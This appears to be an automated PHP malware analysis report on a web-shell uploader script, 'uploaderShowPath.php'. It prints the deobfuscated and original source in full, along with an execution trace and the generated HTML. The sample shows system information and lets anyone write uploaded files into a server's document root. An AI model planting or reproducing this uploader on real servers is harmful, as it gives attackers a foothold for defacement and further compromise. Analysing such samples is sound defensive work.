PHP Malware Analysis
uploaderShowPath.php
md5: fa443fab9b6989954cdf60fa7f309cb8
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- php_uname (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
echo "Priv8 Home Root Uploader by SinonX - Family Attack Cyber<br>";
echo "<b>" . php_uname() . "</b><br>";
echo "<form method='post' enctype='multipart/form-data'>\n\t <input type='file' name='idx_file'>\n\t <input type='submit' name='upload' value='upload'>\n\t </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
if (is_writable($root)) {
if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://" . $_SERVER['HTTP_HOST'] . "/";
echo "sukses upload -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
} else {
echo "gagal upload di document root.";
}
} else {
if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "sukses upload <b>{$files}</b> di folder ini";
} else {
echo "gagal upload";
}
}
}Execution traces
data/traces/fa443fab9b6989954cdf60fa7f309cb8_trace-1676252633.2715.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:44:19.169297]
1 0 1 0.000152 393608
1 3 0 0.000230 399024 {main} 1 /var/www/html/uploads/uploaderShowPath.php 0 0
2 4 0 0.000248 399024 php_uname 0 /var/www/html/uploads/uploaderShowPath.php 3 0
2 4 1 0.000264 399136
2 4 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/uploaderShowPath.php 8 $root = '/var/www/html'
1 A /var/www/html/uploads/uploaderShowPath.php 9 $files = NULL
1 A /var/www/html/uploads/uploaderShowPath.php 10 $dest = '/var/www/html/'
1 3 1 0.000340 399064
0.000366 314432
TRACE END [2023-02-12 23:44:19.169543]
Generated HTML code
<html><head></head><body>Priv8 Home Root Uploader by SinonX - Family Attack Cyber<br><b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b><br><form method="post" enctype="multipart/form-data">
<input type="file" name="idx_file">
<input type="submit" name="upload" value="upload">
</form></body></html>Original PHP code
<?php
echo "Priv8 Home Root Uploader by SinonX - Family Attack Cyber<br>";
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "sukses upload -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload di document root.";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "sukses upload <b>$files</b> di folder ini";
} else {
echo "gagal upload";
}
}
}
?>